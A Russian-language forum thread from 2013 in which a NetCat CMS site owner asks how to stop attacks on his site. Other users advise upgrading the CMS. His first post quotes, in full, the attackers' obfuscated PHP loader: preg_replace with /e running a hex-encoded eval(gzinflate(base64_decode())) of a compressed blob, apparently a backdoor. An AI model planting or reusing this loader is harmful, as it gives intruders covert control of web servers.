|
|
17.10.2013, 10:17
|
|
Geser
Журба Сергей Анатольевич
Зарегистрирован:
2008-04-29
Сообщений: 35
|
Здравствуйте.
У меня ломают сайт.
Видимо используют какую то уязвимость.
Используют вот такой код:
Код:<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZe9juNIDITzA/YdBoMJ9pKF3b8SBvcmk0iyHW188ONfs/jR8ugWs9igIUvq5k+xWJTf7tttu7y8/Pjn5fXj3k9jpY97q2P1j3u97ff2rm1jncfK/ixNY433aexL17EW/6139nzzax3XPvbmNlZ9uu/+7NP78+f7kp/uh608Hfb3z/bK4XyeD/bq4X37wt8xHou3fJHPr+I75n+0d/T3bC8f4ssH/2NvOeL3VXzt//7+6Dz5pRF3H7Wudn7cl/G7LfCneA1k1+6tPpOvbrWYfX81u8XxLsErO3eDX5exP7tP+10ubqNRY/NjWLZ1XE9uT5w1G+Bqts1/SR5fKcRr/ohd9Zk9H+OG9rFsj2IxzMzW2XNWPs19Gr8Mp05MrYBT8/O1vb5/++vtvi2lRZ+ZX+slcRcc7Zz8r95Djz403PCZVr+3fMVrcDUcDB/L37Bqye1b7mavzGCx+D7LX9xZ3IddMzla/bWnuT3z1aufMRviA/WV/cXjs/PymcF/8lpmeB57xIlMHpPX3HKJqzhCHMa5Gppy83eZPGoCh+p7xcsbuJ/hTaW+xWOxeA3D2vd7i8fsiH/4aVevieLa4MQGXuRgmNo5cYi6N2x2NFEcTpxtXhfjmnjLnuCV+cxwVTmdPU7xdOb8yvnKu8uOZ8d/RdPMnmw2r4dquhCD1W/1a5v9mWpDXBmNV7/M2Kp+RnhsxDyjCxMYd2qXPdYGl2rMjNU5Lm3o1GED8+Bcdb9mR/1AD0QdLU/DwGyZb/HP6l+9z6ZLf8wzizt6VhzBnuKszi2re3BJvQh3VMeJOlf0pNBzGe5lcGzOK9MlxUs9rJYVvtp76wFxeKb2Tz3Qo/eCZ4F7YHZ1PCtzwHglzSvgdtm5L+0o6NfF48lo74Mfkz+TFi/oDPNN/Zt2LrZlzyl6Tjo+7/kZNoq5g3nnWUa3LqzN9cT2WK6P/kPXjQs6l4jlylzYvE4lemaCB2XXaIvXnnc0Xvoz7/0pXWe+1LTHVGNWhcZGboX+CQ6jb9I9cpXt4CkzSXqawPWGPbS6hObM5MnMq+wvaGOlD0JTpEXEK7wTGjfvuatO216P6N+CTsRcDZ0o6JowXPeelV3iePCyRY97n6X5XB99NrmPmP+VeaGzHfuF+DqcO1GLlT6amQuV+QgHhEtHCxI9VPfeNy7qGZhl+Ke98EUasTCnmYGh8THHhE+l3gs5r+TCrNf3x4xOzOhEo5cbeKOPJWbJ6pgoJr4vxYerx9fptY5/fRdQD/HlTJ7Ru2WfPZrNJ3SOmO1es2NmRqzMVL4jCphq1sy7HhdisFz0DRz7A4eT45Yjb2ZxDY4m5gN9nNOuUYka21XzN/NNwXzIfEepNuhjhkuyA6dCBzp9VZcDvze06wS+6GGDmzp78horv+ixzfcXcFG8k9crU7f0/D8jfXz+X/G7e/rz+T+RluW5vr5f/11+fn/zv2I/XvhWtB8aZvbDuu3v9/8A'\x29\x29\x29\x3B","");
?>
Подскажите как можно защититься.
Версия 401 Standart, но дополнительно докупал модули поиска, авторизации и голосования.
Если CMS тебе понятна, значит, она уже устарела
|
|
|
17.10.2013, 11:40
|
|
ipm
Ильин Павел
Зарегистрирован:
2012-10-12
Сообщений: 386
|
Нужно в первую очередь обновиться до актуальной версии системы.
Знание может быть лишь у того, у кого есть вопросы. Ханс Георг Гадамер
|
|
|
17.10.2013, 14:53
|
|
Geser
Журба Сергей Анатольевич
Зарегистрирован:
2008-04-29
Сообщений: 35
|
Какая версия движка является актуальной?
Достаточно обновить до 4.7.2 что бы убрались все дыры?
Если CMS тебе понятна, значит, она уже устарела
|
|
|
17.10.2013, 15:32
|
|
ipm
Ильин Павел
Зарегистрирован:
2012-10-12
Сообщений: 386
|
Актуальной является версия 5.2.
Желательно обновиться именно до этой версии.
4 версия ведь уже даже не продаётся.
Знание может быть лишь у того, у кого есть вопросы. Ханс Георг Гадамер
|
|
|
17.10.2013, 15:55
|
|
Geser
Журба Сергей Анатольевич
Зарегистрирован:
2008-04-29
Сообщений: 35
|
Я знаю актуальную версию.
Только на этой неделе приобрел движок.
Но честно говоря, не хочется переводить старые сайты на 5 версию.
4-ка мне кажется удобнее и в ней все понятно.
Если CMS тебе понятна, значит, она уже устарела
|
|
|
17.10.2013, 16:06
|
|
ipm
Ильин Павел
Зарегистрирован:
2012-10-12
Сообщений: 386
|
5 версия вполне себе нормальная.
Она же поддерживает компоненты четверки. Ну и не зря же неткэтовцы работают и улучшают систему. С момента выхода четверки прошло уже много времени. Если проблемы в безопасности, то лучше всё-таки обновиться до пятерки.
Понятно, что многие ещё не привыкли к 5 версии системы, но в целом движок стал лучше.
Знание может быть лишь у того, у кого есть вопросы. Ханс Георг Гадамер
|
|
|
18.10.2013, 08:56
|
|
Geser
Журба Сергей Анатольевич
Зарегистрирован:
2008-04-29
Сообщений: 35
|
В общем обновил до 4.7.2, вроде пока все нормально.
А с пятой одни косяки и непонятки.
Я купил в середине мая сырую пятерку, когда еще продавалась 4-ка, остались самые негативные впечатления. Ни как не мог оформить контент на странице. Дошло до того, что пришлось вставлять готовый html код страницы непосредственно в тамблицу в БД через phpMyAdmin.
На неделе купил АКТУАЛЬНУЮ (ваше выражение) версию 5.2, не смог разобраться как сделать фотогалереи, как сделать слайдшоу, ничего не работает, в онлайн документации об этом не слова.
А в 4-ке все работает и никаких вопросов.
Если CMS тебе понятна, значит, она уже устарела
|
|
|
18.10.2013, 12:03
|
|
ipm
Ильин Павел
Зарегистрирован:
2012-10-12
Сообщений: 386
|
Когда пятерка только вышла, то да, она была сырая, сейчас 5 версия однозначно лучше четверки.
Знание может быть лишь у того, у кого есть вопросы. Ханс Георг Гадамер
|
|
|
06.11.2013, 04:31
|
|
Гость
Гость
|
Ломать и по ftp могут. А вообще лучше обновиться до пятой, четвёртые версии использовать страшно, если защиту не поставили, то сломают быстро. Может и в пятой тоже дыры есть, пока не сталкивался.
|
|
|
15.11.2013, 00:48
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Цитата:Какая версия движка является актуальной?
Достаточно обновить до 4.7.2 что бы убрались все дыры?
Нет. Желательно еще перевести все компоненты и макеты дизайна в формат 5.0
Temet nosce...
|
